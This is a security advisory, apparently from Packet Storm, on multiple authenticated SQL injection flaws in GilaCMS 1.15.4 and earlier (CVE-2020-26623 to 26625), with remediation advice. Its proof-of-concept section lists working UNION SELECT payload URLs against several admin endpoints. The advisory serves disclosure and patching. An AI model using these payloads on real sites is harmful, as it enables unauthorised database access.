Headline

GilaCMS 1.15.4 SQL Injection

GilaCMS versions 1.15.4 and below suffer from multiple remote SQL injection vulnerabilities.

10 months ago

Description: GilaCMS <=1.15.4 - Mutiple SQL injection vulnerabiltiesAffected CMS: GilaCMSAffected Version: <= 1.15.4CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625CVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HDiscoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.LtdMultiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allows a remote attacker to execute arbitary web scripts.Proof of Concept:Attack Vector 1:After login into admin portal, go to administration>widget and use wiget area filter to perform searchSample payload:http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20Attack Vector 2:After login into admin portal, go to edit post/page/role/user/category/userpostSample payload:http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_updateAttacker Vector 3:After login into admin portal, go to Content>Posts and use Users filter to perform searchSample payload:http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20RecommendationUpdate to v2.0.1http://gilacms.comhttps://github.com/GilaCMS/gilahttps://github.com/GilaCMS/gila/security/policy

Packet Storm: Latest News

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download

20 hours ago

Packet Storm

TX Text Control .NET Server For ASP.NET Arbitrary File Read / Write

20 hours ago

Packet Storm

GravCMS 1.10.7 Arbitrary YAML Write / Update

21 hours ago

Packet Storm

PHP-CGI Argument Injection Remote Code Execution

21 hours ago

Packet Storm

PHP-CGI Argument Injection Susceptibility Scanner

21 hours ago

Packet Storm